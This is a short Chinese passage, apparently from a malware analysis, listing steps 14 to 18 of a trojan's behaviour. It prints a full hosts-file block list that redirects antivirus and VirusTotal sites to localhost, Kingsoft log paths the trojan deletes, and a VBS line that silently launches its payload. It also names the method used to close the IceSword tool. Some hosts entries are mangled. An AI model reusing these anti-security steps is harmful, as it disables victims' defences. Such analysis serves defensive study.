屏蔽安全厂商网站
14、修改host表,屏蔽安全厂商网站:
# ****下面是恶意网站
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1 www.qihoo.com
127.0.0.1 www.qihoo.cn
127.0.0.1 124.40.51.17
127.0.0.1 58.17.236.92',0
127.0.0.1 www.kaspersky.com
27.0.0.1 60.210.176.251
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com,0
127.0.0.1 www.jiangmin.com
203.208.37.99 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
203.208.37.99 shadu.duba.net
203.208.37.99 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com,0
127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com,0
15、删除金山通行证的记录信息,达到破坏金山毒霸升级的目的。
c:\documents and settings\all users\application data\kingsoft\kis\log.dat
c:\documents and settings\all users\application data\kingsoft\kis\user.dat
16、破坏安全模式及带网络的安全模式。
17、向%windir%\ini\目录下的shit.vbs写入如下内容:
On Error Resume NextSet rs=createObject("Wscript.shell")rs.run "%windir%\ini\ini.exe",0
并调用该VBS启动ini.exe。
18、查找AfxControlBar42s窗口类,用来关闭IceSword。
网友评论